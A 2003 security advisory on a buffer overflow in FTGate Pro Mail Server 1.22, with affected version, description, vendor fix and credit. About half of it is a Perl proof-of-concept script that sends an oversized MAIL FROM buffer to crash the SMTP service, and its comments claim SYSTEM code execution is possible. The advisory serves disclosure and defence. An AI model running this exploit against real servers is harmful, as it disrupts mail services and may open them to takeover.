Reported May 06, 2003, by
Dennis Rand.
VERSIONS
AFFECTED
Floosietek FTGate Pro
Mail Server 1.22 (build 1328)
DESCRIPTION
A vulnerability
in FTGate Pro Mail Server 1.22 (build 1328) can result in the execution of
arbitrary code on the vulnerable system. This vulnerability stems from a
buffer-overflow condition. If an attacker sends a large amount of code into the
MAIL FROM and the RCPT TO fields, the buffer will overflow. Using carefully
crafted code, the attacker can use system privileges to execute arbitrary
commands.
DEMONSTRATION
The
discoverer posted the following code as proof of concept:
----------------------------- \[Exploit Code\] --------------------------
#!/usr/bin/perl -w
################## # FTGate Pro Mail Server v. 1.22
(1328) DoS attack # #
URL:
http://www.infowarfare.dk/ # EMAIL:
[email protected] #
USAGE: sploit.pl <target ip> # # Summary: # # The
problem is a Buffer
Overflow in the SMTP protocol, within the
# ESMTP Server FTGate,
causing the service to stop responding for a short #
Period, where we can
actually overwrite the exception handler on the stack
allowing
# A system compromise
with code execution running as SYSTEM.
#
#
# Solution:
# Upgrade to FTGate
Pro Mail Server v. 1.22 (HotFix 1330) or later #
#
use IO::Socket;
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "a" x
2400;
my $sock =
IO::Socket::INET->new (
PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp'
) || die "could not connect: $!";
my $banner = <$sock>;
if ($banner !~ /^2.*/)
\{
print STDERR
"Error: invalid server response '$banner'.\n";
exit(1);
\}
print $sock "HELO
$target\r\n";
$resp = <$sock>;
print $sock "MAIL
FROM: $Buffer\@$Buffer.dk\r\n";
$resp = <$sock>;
print $sock "\r\n";
print $sock
"\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
----------------------------- \[Exploit Code\] --------------------------
VENDOR
RESPONSE
Floosietek has released
build 1330,
which isn't vulnerable to this condition.
CREDIT
Discovered by
Dennis Rand.
Buffer Overrun Vulnerability in Floosietek FTGate Pro Mail Server 1.22
0 comments
Hide comments